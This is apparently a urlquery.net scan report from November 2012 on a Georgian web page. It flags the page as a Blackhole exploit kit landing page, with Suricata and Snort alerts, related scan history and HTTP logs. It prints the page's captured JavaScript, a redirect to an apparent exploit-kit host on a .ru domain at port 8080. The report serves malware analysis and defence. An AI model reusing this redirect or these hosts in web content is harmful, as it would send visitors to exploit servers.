urlquery.net - Free url scanner

Overview

URL	http://foods.ge/upload.htm
IP	212.58.108.178
ASN	AS28751 Caucasus Online Ltd.
Location	Georgia
Report completed	2012-11-09 10:02:02 CET
Status	Loading report..
urlQuery Alerts	No alerts detected

Settings

UserAgent	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader	8.0
Java	1.6.0_26

Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-09 10:01:28	212.58.108.178	urlQuery Client	1	ET CURRENT_EVENTS Blackhole Redirection Page You Will Be Forwarded - 7th August 2012
2012-11-09 10:01:28	212.58.108.178	urlQuery Client	1	ET CURRENT_EVENTS Blackhole Landing Please wait a moment Jun 20 2012

Snort /w Sourcefire VRT

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-09 10:01:25	212.58.108.178	urlQuery Client	1	EXPLOIT-KIT Blackhole landing page download attempt
2012-11-09 10:01:25	212.58.108.178	urlQuery Client	1	EXPLOIT-KIT Blackhole landing page download attempt

Recent reports on same IP/ASN/Domain

Last 5 reports on IP: 212.58.108.178

Date	Alerts / IDS	URL	IP
2013-02-06 07:42:51	0 / 2	http://chateautelavi.com/tours/cacheds/page.php	212.58.108.178
2012-11-25 02:44:09	0 / 0	http://www.algorithm.ge	212.58.108.178
2012-11-17 02:11:44	0 / 0	http://www.chateautelavi.com/track.php	212.58.108.178
2012-11-09 18:07:39	1 / 1	http://www.computershop.ge/	212.58.108.178
2012-10-25 11:54:16	2 / 2	http://foods.ge/mail.htm	212.58.108.178

Last 6 reports on ASN: AS28751 Caucasus Online Ltd.

Date	Alerts / IDS	URL	IP
2013-02-13 05:51:20	0 / 14	http://www.ozurgeti.info/index.php???????????????/?????????-	212.58.116.73
2013-02-12 20:51:27	2 / 2	http://www.almustafa.ge/az/user/beercokekly	212.58.116.79
2013-02-12 20:22:29	2 / 2	http://www.almustafa.ge/az/user/germangurmann	212.58.116.79
2013-02-09 12:02:41	0 / 2	http://egygumlo.ru/	78.139.162.113
2013-02-06 12:48:15	0 / 0	http://funke-geo.ge/	62.168.168.185
2013-02-06 07:42:51	0 / 2	http://chateautelavi.com/tours/cacheds/page.php	212.58.108.178

Last 1 reports on domain: foods.ge

Date	Alerts / IDS	URL	IP
2012-10-25 11:54:16	2 / 2	http://foods.ge/mail.htm	212.58.108.178

JavaScript

Executed Scripts (3)

Executed Evals (1)

#1 JavaScript::Eval (size: 106, repeated: 1)

var1 = 49;
var2 = var1;
if (var1 == var2) {
    document.location = "http://lenindeads.ru:8080/forum/links/column.php";
}

Executed Writes (0)

HTTP Transactions (4)

Request	Response
GET /upload.htm HTTP/1.1 Host: foods.ge User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html Date: Fri, 09 Nov 2012 09:01:16 GMT Server: Apache/2.2.4 (Win32) Last-Modified: Mon, 08 Oct 2012 17:19:33 GMT Etag: "12bf3-3f0-6cd6258d" Accept-Ranges: bytes Content-Length: 1008 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive
GET /favicon.ico HTTP/1.1 Host: foods.ge User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 Date: Fri, 09 Nov 2012 09:01:16 GMT Server: Apache/2.2.4 (Win32) Content-Length: 209 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive
GET /favicon.ico HTTP/1.1 Host: foods.ge User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 Date: Fri, 09 Nov 2012 09:01:18 GMT Server: Apache/2.2.4 (Win32) Content-Length: 209 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive
GET /favicon.ico HTTP/1.1 Host: foods.ge User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 Date: Fri, 09 Nov 2012 09:01:19 GMT Server: Apache/2.2.4 (Win32) Content-Length: 209 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive